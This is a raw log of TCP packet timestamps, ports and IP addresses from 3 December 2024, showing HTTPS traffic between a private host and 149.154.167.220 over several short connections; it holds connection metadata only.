Dec 3, 2024 14:29:06.208211899 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.208353996 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.208375931 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.208437920 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.208461046 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.216629028 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.216721058 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.216737986 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.217020035 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217032909 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.217240095 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217372894 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217463970 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217575073 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217746973 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217778921 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217818022 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.217843056 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.218734026 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.218753099 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.218858957 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.218873024 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.220391989 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.221362114 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.221376896 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.221402884 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.221642971 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.221690893 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.221780062 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.221894026 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.221930027 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.221971035 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222006083 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222188950 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.222188950 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222194910 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222208977 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.222398043 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.222592115 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222624063 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222882032 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222891092 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222908020 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222950935 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.222982883 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223025084 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223062992 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223073006 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223480940 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.223619938 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.223774910 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223792076 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.223810911 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223870039 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223880053 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223896980 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223927975 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.223972082 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.224047899 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.224060059 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.224067926 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.224122047 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.224158049 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.225047112 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.225161076 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.227761030 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.227780104 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.228009939 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.228421926 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.228610039 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.228929996 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.229011059 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.229048014 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.229264975 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.229309082 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.229379892 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.238907099 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.238954067 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.239027977 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.239046097 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.239306927 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.239326000 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.239367962 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.239387035 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.239401102 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.239859104 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.239871979 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.243089914 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.243206978 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.243551016 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.243745089 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.243760109 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.243813038 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.243872881 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.243921995 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.244205952 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.244316101 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.255944967 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.256190062 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256299973 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256309986 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.256334066 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256521940 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256561041 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256692886 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256786108 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256838083 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256889105 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256899118 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.256973982 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.257208109 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.303344011 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.303592920 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.303715944 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.303802013 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.303867102 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.303937912 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.328735113 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.328825951 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.328953981 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.328977108 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.329022884 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.329040051 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.329097986 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.329158068 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.331566095 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.331583977 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.331635952 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.331695080 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.331712008 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.331744909 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.331763983 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.331793070 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.331876040 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:06.337176085 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.339318991 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:06.343920946 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:08.026261091 CET	443	49935	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:08.026319027 CET	49935	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:08.026343107 CET	443	49935	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:08.026390076 CET	49935	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:08.026993990 CET	49935	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:08.027015924 CET	443	49935	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:08.347656965 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:08.347707987 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:08.347825050 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:08.355014086 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:08.355046988 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.367192030 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.367324114 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.367326975 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.367376089 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.367835999 CET	49938	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.367855072 CET	443	49938	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.519454956 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.519494057 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.519576073 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.519833088 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.519840956 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.731148005 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.731396914 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.731847048 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.731858969 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.732101917 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.732109070 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:09.732197046 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:09.732201099 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:10.391050100 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:10.391133070 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:10.391212940 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:10.391503096 CET	49949	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:10.391525984 CET	443	49949	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:10.931822062 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:10.931972980 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:11.132096052 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:11.132124901 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:11.135937929 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:11.135970116 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:11.136046886 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:11.136053085 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:11.996718884 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:11.996794939 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:11.996953011 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:11.997220993 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:11.997236967 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:11.999530077 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:11.999618053 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:11.999711990 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:12.000061035 CET	49953	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:12.000081062 CET	443	49953	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.452761889 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.452826977 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453188896 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453196049 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453443050 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453448057 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453596115 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453612089 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453618050 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453622103 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453665018 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453670025 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453726053 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453737974 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453768969 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453778028 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453798056 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453802109 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453876972 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453888893 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.453913927 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.453926086 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454010963 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454020977 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454041004 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454051971 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454108953 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454119921 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454130888 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454135895 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454186916 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454195023 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454243898 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454256058 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454272032 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454282045 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454282999 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454291105 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454339027 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454353094 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454359055 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454363108 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454384089 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454392910 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454436064 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454448938 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454488039 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454494953 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454549074 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454561949 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454567909 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454571009 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454660892 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454672098 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454705954 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454719067 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454761982 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454772949 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454792976 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454804897 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454845905 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454853058 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454896927 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454909086 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454926014 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454933882 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.454986095 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.454996109 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.455001116 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.455003977 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.455073118 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.455089092 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.455099106 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.455143929 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.455149889 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.455174923 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.455219030 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466114044 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466121912 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466377974 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466389894 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466484070 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466497898 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466546059 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466552019 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466608047 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466612101 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466734886 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466746092 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466766119 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466777086 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466835976 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466841936 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466852903 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466861010 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466871023 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466877937 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.466921091 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.466933012 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.467031002 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467039108 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.467045069 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467048883 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.467073917 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467082024 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.467102051 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467108965 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.467113972 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467117071 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.467176914 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467214108 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467252016 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467266083 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467287064 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.467334986 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.481723070 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.511338949 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.511610031 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.511697054 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.511738062 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.511746883 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.511877060 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.511931896 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.512960911 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.559334993 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.560328960 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.560381889 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.560424089 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.560453892 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.560486078 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.572128057 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.572174072 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.572313070 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.572551012 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.572565079 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.575481892 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.603358984 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.604216099 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.604247093 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.604399920 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.604477882 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.604515076 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.604554892 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.606729984 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.651356936 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:13.651662111 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.651751041 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.651823997 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.651870966 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:13.651911974 CET	49959	443	192.168.2.5	149.154.167.220
